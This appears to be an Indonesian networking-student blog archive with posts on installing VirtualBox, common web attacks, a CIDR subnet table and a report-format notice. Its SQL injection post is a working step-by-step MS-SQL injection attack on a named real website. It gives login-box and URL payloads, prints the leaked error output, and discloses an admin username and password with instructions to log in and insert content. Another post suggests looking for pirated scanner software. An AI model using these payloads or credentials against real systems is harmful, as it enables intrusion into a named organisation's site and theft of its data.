instalasi virtualbox di opensuse

instalasi virtualbox di opensuse

Instalasi VirtualBox di openSUSE

Bagi siswa TKJ yang sedang melaksanakan pembelajaran latihan menginstall sistem operasi, agar sistem operasi yang ada di lab tidak terganggu maka lebih baik digunakan virtual box agar bisa menginstall sistem operasi di atas sistem operasi tanpa mengganggu sistem operasi yang sudah ada.
VirtualBox adalah salah satu software Virtualisasi yang dapat digunakan untuk menjalankan sistem operasi lain. Misalnya saya melakukan instalasi VirtualBox pada openSUSE, saya bisa menggunakan VirtualBox pada openSUSE untuk menjalankan sistem Windows atau distro Linux lainnya. Fungsi ini sangat penting jika kita ingin melakukan ujicoba dan simulasi instalasi maupun melakukan testing suatu sistem tanpa harus kehilangan sistem yang ada. Saya bisa mencoba Windows atau Ubuntu atau Fedora atau Red Hat tanpa harus melakukan install ulang openSUSE yang saya gunakan. Aplikasi dengan fungsi sejenis lainnya adalah VMWare dan Microsoft Virtual Server.
Apa keuntungan VirtualBox dibandingkan dengan aplikasi sejenis. Yang utama adalah karena VirtualBox Free dan Open Source. VirtualBox tersedia dalam berbagai edisi namun skema lisensi yang ditawarkan cukup ramah bagi pengguna, misalnya versi OSE (Open Source Edition) yang Free dan Open Source dan versi binary yang free untuk penggunaan personal.
Instalasi VirtualBox sangat mudah. Versi OSE bahkan sudah disediakan diberbagai distro. Pada artikel ini saya menggunakan VirtualBox Binary Edition dengan Installer yang cocok untuk berbagai distro (meski tersedia juga file rpm untuk openSUSE). Saya melakukan instalasi pada distro openSUSE 11.1 RC 1. Berikut adalah panduannya :
  1. Download VirtualBox untuk Linux dari http://www.virtualbox.org/wiki/Downloads. Pilih VirtualBox 2.0.6 (atau versi terbaru) for Linux Host dan pilih All distributions. Akan didapatkan file dengan nama seperti : VirtualBox-2.0.6-39760-Linux_x86.run
  2. Jika sudah pernah ada versi OSE, remove terlebih dahulu
  3. Ubah file installer menjadi executable
    chmod +x VirtualBox-2.0.6-39760-Linux_x86.run
  4. Install

-->
  • Verifying archive integrity… All good.
  • Uncompressing VirtualBox for Linux installation……..
    VirtualBox Version 2.0.6 (2008-11-21T20:30:27Z) installer
    Installing VirtualBox to /opt/VirtualBox-2.0.6
    Building the VirtualBox kernel module
  • VirtualBox has been installed successfully.
  • You will find useful information about using VirtualBox in the user manual
    /opt/VirtualBox-2.0.6/UserManual.pdf
    and in the user FAQ
    http://www.virtualbox.org/wiki/User_FAQ
  • We hope that you enjoy using VirtualBox.

5. Buka Yast | Security and User | User Management. Pilih username, klik Edit, Pada tab detail pilih vboxusers (berikan tanda centang) atau gunakan perintah konsole :
  1. 1.groupmod --add-user vavai vboxusers
    Catatan : Ganti nama vavai dengan nama user yang digunaka. Jangan lupa, lihat Group ID (GID) dari vboxuser tadi untuk digunakan pada langkah 6
  2. Aktifkan dukungan USB.
    Edit /etc/fstab, pada baris akhir tambahkan :
    none /proc/bus/usb usbfs devgid=XXX, devmode=664 0 0
    dimana XXX adalah GID tadi. Hal ini perlu untuk menjalankan VirtualBox itu sendiri, dan agar port USB dapat
    diakses oleh Guest OS yang dipasang.
  3. Klik Menu | System | VirtualBox atau gunakan menu search
  4. Klik I Agree untuk menerima lisensi VirtualBox (Scroll Down kalau kondisinya masih disable)
  5. Isi nama dan alamat email untuk registrasi penggunaan (kepentingan statistik)
  6. VirtualBox akan menampilkan menu utama
sekarang adalah waktunya menggunakan VirtualBox untuk melakukan instalasi sistem operasi. Banyak tutorial yang berhenti pada tata cara instalasi saja dan ini membingungkan bagi rekan-rekan yang baru pertama kali bersentuhan dengan VirtualBox. Anyway, sebenarnya ini pengalaman pribadi saya :-D
Setelah instalasi selesai, kita akan berhadapan dengan tampilan utama VirtualBox. Dalam contoh artikel ini saya menggunakan VirtualBox 2.0.6 pada openSUSE 11.1 RC1 untuk melakukan instalasi openSUSE 11.1 RC1.
BTW, bisa tidak jika menggunakan sistem operasi lain, misalnya Ubuntu 8.10 Intrepid Ibex atau Fedora 10 Cambridge atau PCLinuxOS atau Redhat atau Slackware atau bahkan Microsoft Windows ? Tentu saja bisa dan boleh-boleh saja. Itulah salah satu keuntungan virtualisasi semacam VirtualBox ini, kita bisa menggunakannya sebagai ajang simulasi, atau media untuk pelajaran mengenai partisi dan format tanpa harus takut data kita berantakan.
VirtualBox juga bia menjadi media untuk ujicoba suatu sistem tanpa harus repot melakukan instalasi dan konfigurasi ulang pada komputer kita.
Berikut adalah panduan instalasi sistem operasi pada VirtualBox :
  1. Buka VirtualBoxVirtualBox Menu
  2. Pilih menu CreateVirtualBox Menu
  3. Masukkan Nama Sistem OperasiVirtualBox Menu
  4. Spesisifikasikan Jumlah MemoriVirtualBox Menu
  5. Pilih Virtual Disk yang akan Digunakan. Pilih Tombol New untuk Setting Pertama KaliVirtualBox Menu
  6. Klik Tombol Next untuk Memulai Pembuatan Harddisk VirtualVirtualBox Menu
  7. Tentukan Tipe Harddisk, Apakah Kapasitasnya Bersifat Dinamis ataukah Permanen. Jika Memilih Dinamis, Kapasitas akan Menyesuaikan dengan Ukuran Data yang DisimpanVirtualBox Menu
  8. Berikan Nama Virtual Disk dan KapasitasnyaVirtualBox Menu
  9. Klik FinishVirtualBox Menu
  10. Sekarang Virtual Disk Sudah Ada. Klik NextVirtualBox Menu
  11. Klik FinishVirtualBox Menu
  12. Kita Sudah Memiliki Virtual Machine. Karena akan Melakukan Instalasi via CD ROM, Lakukan Proses Mount. Klik pada CD ROMVirtualBox Menu
  13. Pilih Mount CD/DVD Drive. Karena Menggunakan File ISO sebagai Media Instalasi, Saya Memilih ISO Image File. Jika iInstalasi akan Dilakukan dari CD Fisik, Pilihlah Host CD/DVD Drive dan Langsung ke Langkah 15VirtualBox Menu
  14. Jika Memilih ISO File, klik Tombol Lookup (Warna Kuning) dan Pilih Tombol Add pada Windows MountVirtualBox Menu
  15. Pilih ISO FileVirtualBox Menu VirtualBox Menu
  16. Klik Tombol Start dan Mulai Proses InstalasiVirtualBox Menu VirtualBox Menu
gimana, mudahkan. semoga bermanfaat.

sumber referensi : http://vavai.com/

Keamanan Webserver



Keamanan suatu website atau web security systems merupakan salah satu prioritas yang sangat utama bagi seorang webmaster.

Tetapi kebanyakan para webmaster hanya mengutamakan design dan topik apa yang harus disediakan supaya menarik pengunjung sebanyak-banyaknya.
Padahal jika seorang webmaster mengabaikan keamanan suatu website, maka yang dirugikan adalah webmaster itu sendiri karena seorang hacker dapat mengambil data-data penting pada suatu website dan bahkan pula dapat mengacak-acak tampilan website(deface) tersebut.
Berikut adalah beberapa metode yang biasa sering digunakan para hacker untuk menyerang suatu website:

1. Remote File Inclusion (RFI)
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna.
Dengan RFI seorang attacker dapat menginclude kan file yang berada di luar server yang bersangkutan.
Anda bisa membaca secara lengkap tentang Remote File Inclusion di http://en.wikipedia.org/wiki/Remote_File_Inclusion

2. Local File Inclusion (LFI)
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna.
Dengan LFI seorang attacker dapat menginclude kan file yang berada di dalam server yang bersangkutan.

3. SQL injection
SQL injection adalah teknik yang memanfaatkan kesalahan penulisan query SQL pada suatu website sehingga seorang hacker bisa menginsert beberapa SQL statement ke ‘query’
dengan cara memanipulasi data input ke aplikasi tersebut.
Anda bisa membaca secara lengkap tentang SQL injection di http://en.wikipedia.org/wiki/SQL_injection

4. Cross Site Scripting (XSS)
XSS dikenal juga dengan CSS adalah singkatan dari Cross Site Scripting.
XSS adalah suatu metode memasukan code atau script HTML kedalam suatu website yang dijalankan melalui browser di client.
Anda bisa membaca secara lengkap tentang Cross Site Scripting di http://en.wikipedia.org/wiki/Cross-site_scripting
Ada pepatah internet mengatakan “Tidak ada hal yang paling aman di dunia internet“,
Memang pepatah itu benar, tetapi disini ada beberapa cara supaya website kita tidak mudah disusupi oleh para hacker, memang cara ini tidak 100% aman, tetapi dapat mengurangi resiko website kita dengan mudah di acak-acak oleh seorang hacker.
1. Jika anda menggunakan suatu CMS seperti joomla, phpbb, phpnuke, wordpress dan sebagainya, rajinlah mengupdate CMS anda dengan CMS terbaru jika muncul versi yang lebih baru.
2. Kunjungilah situs-situs yang membahas tentang keamanan aplikasi web seperti : www.milw0rm.com, www.securityfocus.com atau www.packetstormsecurity.org untuk mendapatkan informasi tentang bug terbaru.
3. Sewalah seorang yang ahli tentang keamanan website untuk menganalisis keamanan website anda.
4. Gunakanlah software seperti Acunetix untuk melakukan scanning atas kelemahan yang bisa terjadi di webdite anda, software tersebut bisa anda beli di www.acunetix.com dan jika anda beruntung mungkin anda bisa melakukan pencarian versi bajakannya di google.com ( maaf ini tidak dianjurkan :D).

sumber : http://www.amhusite.co.cc/2009_04_01_archive.html

SQL Injection

SQL Injection


saat ini saya sedang menyelesaikan tugas akhir D3 TKJ, dengan masalah penelitian keamanan jaringan. ternyata banyak juga ya... istilah dan cara untuk masuk ke webserver. salah satunya adalah SQL Injection. saya coba kupas SQL injection ini, dimana saya dapat referensi yang bagus dari blognya Fatkhan sites.
SQL Injection yang dibawah hanya pada MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
http://www.amhusite.co.cc/2009_04_01_archive.html
subnetting dengan CIDR

subnetting dengan CIDR

Classless Inter-Domain Routing (disingkat menjadi CIDR) adalah sebuah cara alternatif untuk mengklasifikasikan alamat-alamat IP berbeda dengan sistem klasifikasi ke dalam kelas A, kelas B, kelas C, kelas D, dan kelas E. Disebut juga sebagai supernetting. CIDR merupakan mekanisme routing yang lebih efisien dibandingkan dengan cara yang asli, yakni dengan membagi alamat IP jaringan ke dalam kelas-kelas A, B, dan C. Masalah yang terjadi pada sistem yang lama adalah bahwa sistem tersebut meninggalkan banyak sekali alamat IP yang tidak digunakan. Sebagai contoh, alamat IP kelas A secara teoritis mendukung hingga 16 juta host komputer yang dapat terhubung, sebuah jumlah yang sangat besar. Dalam kenyataannya, para pengguna alamat IP kelas A ini jarang yang memiliki jumlah host sebanyak itu, sehingga menyisakan banyak sekali ruangan kosong di dalam ruang alamat IP yang telah disediakan. CIDR dikembangkan sebagai sebuah cara untuk menggunakan alamat-alamat IP yang tidak terpakai tersebut untuk digunakan di mana saja. Dengan cara yang sama, kelas C yang secara teoritis hanya mendukung 254 alamat tiap jaringan, dapat menggunakan hingga 32766 alamat IP, yang seharusnya hanya tersedia untuk alamat IP kelas B.

Berikut ini tabel subnet yang dapat anda gunakan :
CIDR Subnet Mask Jumlah Host
/32 255.255.255.255 1
/31 255.255.255.254 2
/30 255.255.255.252 4
/29 255.255.255.248 8
/28 255.255.255.240 16
/27 255.255.255.224 32
/26 255.255.255.192 64
/25 255.255.255.128 128
/24 255.255.255.0 256
/23 255.255.254.0 512
/22 255.255.252.0 1,024
/21 255.255.248.0 2,048
/20 255.255.240.0 4,096
/19 255.255.224.0 8,192
/18 255.255.192.0 16,384
/17 255.255.128.0 32,768
/16 255.255.0.0 65,536
/15 255.254.0.0 131,072
/14 255.252.0.0 262,144
/13 255.248.0.0 524,288
/12 255.240.0.0 1,048,576
/11 255.224.0.0 2,097,152
/10 255.192.0.0 4,194,304
/9 255.128.0.0 8,388,608
/8 255.0.0.0 16,777,216
/7 254.0.0.0 33,554,432
/6 252.0.0.0 67,108,864
/5 248.0.0.0 134,217,728
/4 240.0.0.0 268,435,456
/3 224.0.0.0 536,870,912
/2 192.0.0.0 1,073,741,824
/1 128.0.0.0 2,147,483,648
/0 0.0.0.0 4,294,967,296
Classful Ranges
0.0.0.0 – 127.255.255.255
128.0.0.0 – 191.255.255.255
192.0.0.0 – 223.255.255.255
224.0.0.0 – 239.255.255.255
240.0.0.0 – 255.255.255.255
Reserved Ranges
RFC1918 10.0.0.0 – 10.255.255.255
Localhost 127.0.0.0 – 127.255.255.255
RFC1918 172.16.0.0 – 172.31.255.255
RFC1918 192.168.0.0 – 192.168.255.255
format laporan PSG 2009-2010 dan pendahuluan laporannya

format laporan PSG 2009-2010 dan pendahuluan laporannya

ini adalah format laporan psg yang terbaru edisi oktober 2009.

tolong setelah di download di buka kompresinya dengan aplikasi winrar.

didalamnya sudah ada kop surat sekolah terbaru dengan sertifikasi ISO dan akreditasi.

format laporan : kertas A4 margin kiri dan atas 4 cm, kanan dan bawah 3cm, huruf times new roman ukuran 12, kecuali untuk tabel (agenda harian, program kegiatan dan daftar hadir marginnya boleh minimal 2 cm tapi 4/3 cm bagi tempat yang jadi tempat jilid, huruf times new roman ukuran 11).

silahkan diselesaikan laporannya dan ditunggu tanggal 17 oktober 2009.

silahkan klik di sini untuk downlod filenya

slamat mengerjakan laporan, keep fighting OKE>>>>....
Back To Top